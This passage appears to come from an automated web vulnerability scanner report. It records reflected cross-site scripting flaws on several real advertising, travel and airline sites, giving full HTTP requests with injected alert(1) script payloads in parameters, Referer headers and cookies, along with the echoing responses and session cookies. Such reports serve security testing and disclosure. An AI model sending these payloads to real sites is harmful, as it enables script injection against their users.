Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js?pubid=c3919e40-e5b8-49f8-b876-4fed1f31968f9eea4"%3balert(1)//0a881cfe5b9 HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:54 GMT
Server: Apache
Set-Cookie: JSESSIONID=424937091139EAD10A8AF0C7310701E7.p0524; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.58
P3P: policyref="http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/p3p/p3p.xml",CP="NOI DSP CURa ADMa DEVa OUR IND UNI COM NAV"
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Content-Type: text/javascript;charset=ISO-8859-1
Connection: close
Content-Length: 2427

var DrfGlobals = {
   sid:"bfa7dd53-c988-458c-86df-52443affccb8", // session id
   pid:"c3919e40-e5b8-49f8-b876-4fed1f31968f9eea4";alert(1)//0a881cfe5b9", // publisher id
   pti:"default", // page type id
   src:"none", // source
   ppi:"eaa76413-f885-4a4e-9fa2-b1caba8ec34b", // page impression id
   version:"v1.0",
   cdnLocation:"http://drf-global.com/se
...[SNIP]...
4.418. http://www9.effectivemeasure.net/v4/em_js [ns parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www9.effectivemeasure.net
Path:   /v4/em_js

Issue detail

The value of the ns request parameter is copied into the HTML document as plain text between tags. The payload 13916<script>alert(1)</script>131d16d4f4e was submitted in the ns parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v4/em_js?flag=0&v=&vt=&hl=&sv=0&pv=&pn=&p=aHR0cDovL3d3dy5nb2FsLmNvbS9lbi90ZWFtcy9lbmdsYW5kLzk3L21hbi11dGQtbmV3cw%3D%3D&r=&f=1&ns=_em13916<script>alert(1)</script>131d16d4f4e&rnd=0.11160158668644726&u=&sf=1& HTTP/1.1
Host: www9.effectivemeasure.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hl=1; vt=ad466b7502917b9a0779b9e202024e62e18088e413-981323754e62e3b1

Response

HTTP/1.1 200 OK
P3P: policyref="http://www.effectivemeasure.net/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-cache, must-revalidate
Pragma-directive: no-cache
Cache-Directive: no-cache
Expires: 0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: hl=1; expires=Tue, 01-Nov-2011 23:54:36 GMT; path=/; domain=.effectivemeasure.net
Set-Cookie: vt=6c50a866261632f39839b9e202024e62e18088e413-981323754e88f9bc; expires=Wed, 26-Sep-2012 23:54:36 GMT; path=/; domain=.effectivemeasure.net
Set-Cookie: v=3e7357252679c073d84af13bd6fa4e88f8d57af834-210214684e88f9bc338_5280; expires=Mon, 03-Oct-2011 00:24:36 GMT; path=/; domain=.effectivemeasure.net
Content-type: text/javascript
Connection: close
Content-Length: 350
Date: Sun, 02 Oct 2011 23:54:36 GMT
Server: C20

_em13916<script>alert(1)</script>131d16d4f4e._domain="goal.com";_em13916<script>alert(1)</script>131d16d4f4e.setCkHl();_em13916<script>alert(1)</script>131d16d4f4e.setCkVt("6c50a866261632f39839b9e2020
...[SNIP]...
4.419. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22361"-alert(1)-"16a37850c5c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=22361"-alert(1)-"16a37850c5c
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4329B7D811FB937AEC454AE93204607C; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:21 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://www.google.com/search?hl=en&q=22361"-alert(1)-"16a37850c5c",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5
...[SNIP]...
4.420. http://www.turkishairlines.com/static/css/ui-lightness/jquery-ui-1.8.14.custom.css [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /static/css/ui-lightness/jquery-ui-1.8.14.custom.css

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload aa46a<script>alert(1)</script>1f4e3095ba was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /static/css/ui-lightness/jquery-ui-1.8.14.custom.css HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.google.com/search?hl=en&q=aa46a<script>alert(1)</script>1f4e3095ba
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.1.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3684


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HTML>
<HEAD>
<title>404</title>
<meta http-equiv=Content-Type content="text/html;
...[SNIP]...
<br>We suggest you try one of the links
below:http://www.google.com/search?hl=en&q=aa46a<script>alert(1)</script>1f4e3095ba
</p>
...[SNIP]...
4.421. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 700d9<script>alert(1)</script>da933ef47aa was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054945&AR_C=43921374 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282700d9<script>alert(1)</script>da933ef47aa

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:00:36 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=99&initExp=Sun Oct 2 23:59:13 2011&recExp=Mon Oct 3 00:00:36 2011&72bcd37b295ce73b6829bb41=1&prad=71054945&arc=43921374&; expires=Sun 01-Jan-2012 00:00:36 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27510

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054945",Pid:"p119936314",Arc:"43921374",Location:C
...[SNIP]...
011&prad=70982068&arc=43901049&', "ar_p90175839": 'exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&', "UID": '9cc29993-80.67.74.150-1314836282700d9<script>alert(1)</script>da933ef47aa', "ar_72bcd37b8f9f0348a793175": 'exp=1&initExp=Mon Oct 3 00:00:22 2011&recExp=Mon Oct 3 00:00:22 2011&prad=71054945&arc=43921374&', "BMX_3PC": '1', "ar_p119936314'": 'exp=1&initExp=Mon Oct 3 00:
...[SNIP]...
4.422. http://ar.voicefive.com/bmx3/broker.pli [ar_p108883753 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p108883753 cookie is copied into the HTML document as plain text between tags. The payload dfc14<script>alert(1)</script>6b4829181d5 was submitted in the ar_p108883753 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054945&AR_C=43921374 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&dfc14<script>alert(1)</script>6b4829181d5; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:00:35 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=87&initExp=Sun Oct 2 23:59:13 2011&recExp=Mon Oct 3 00:00:35 2011&72bcd37b295ce73b6829bb41=1&prad=71054945&arc=43921374&; expires=Sun 01-Jan-2012 00:00:35 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27510

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054945",Pid:"p119936314",Arc:"43921374",Location:C
...[SNIP]...
p=Mon Oct 3 00:00:35 2011&72bcd37b295ce73b6829bb41=1&prad=71054945&arc=43921374&', "ar_p108883753": 'exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&dfc14<script>alert(1)</script>6b4829181d5', "ar_p82806590": 'exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&', "ar_p110620504": 'exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:
...[SNIP]...
4.423. http://ar.voicefive.com/bmx3/broker.pli [ar_p109848095 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p109848095 cookie is copied into the HTML document as plain text between tags. The payload 33a3b<script>alert(1)</script>5947cd7d417 was submitted in the ar_p109848095 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054945&AR_C=43921374 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&33a3b<script>alert(1)</script>5947cd7d417; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:00:34 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=81&initExp=Sun Oct 2 23:59:13 2011&recExp=Mon Oct 3 00:00:34 2011&72bcd37b295ce73b6829bb41=1&prad=71054945&arc=43921374&; expires=Sun 01-Jan-2012 00:00:34 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27510

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054945",Pid:"p119936314",Arc:"43921374",Location:C
...[SNIP]...
41&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1317599974%2E004%2Cwait%2D%3E10000%2C', "ar_p109848095": 'exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&33a3b<script>alert(1)</script>5947cd7d417', "ar_p90175839": 'exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&', "UID": '9cc29993-80.67.74.150-1314836282', "ar_72bcd37b8f9f0348a793175
...[SNIP]...
4.424. http://ar.voicefive.com/bmx3/broker.pli [ar_p110620504 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p110620504 cookie is copied into the HTML document as plain text between tags. The payload 71ebb<script>alert(1)</script>cbdc459a308 was submitted in the ar_p110620504 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054945&AR_C=43921374 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&71ebb<script>alert(1)</script>cbdc459a308; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:00:33 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=69&initExp=Sun Oct 2 23:59:13 2011&recExp=Mon Oct 3 00:00:33 2011&72bcd37b295ce73b6829bb41=1&prad=71054945&arc=43921374&; expires=Sun 01-Jan-2012 00:00:33 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27510

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054945",Pid:"p119936314",Arc:"43921374",Location:C
...[SNIP]...
ep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&', "ar_p110620504": 'exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&71ebb<script>alert(1)</script>cbdc459a308', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1317599974%2E004%2Cwait%2D%3E10000%2C', "ar_p109848095": 'exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&',
...[SNIP]...
4.425. http://ar.voicefive.com/bmx3/broker.pli [ar_p63514475 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p63514475 cookie is copied into the HTML document as plain text between tags. The payload f07ef<script>alert(1)</script>367a49a45ca was submitted in the ar_p63514475 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054945&AR_C=43921374 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&f07ef<script>alert(1)</script>367a49a45ca; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:00:33 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=75&initExp=Sun Oct 2 23:59:13 2011&recExp=Mon Oct 3 00:00:33 2011&72bcd37b295ce73b6829bb41=1&prad=71054945&arc=43921374&; expires=Sun 01-Jan-2012 00:00:33 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
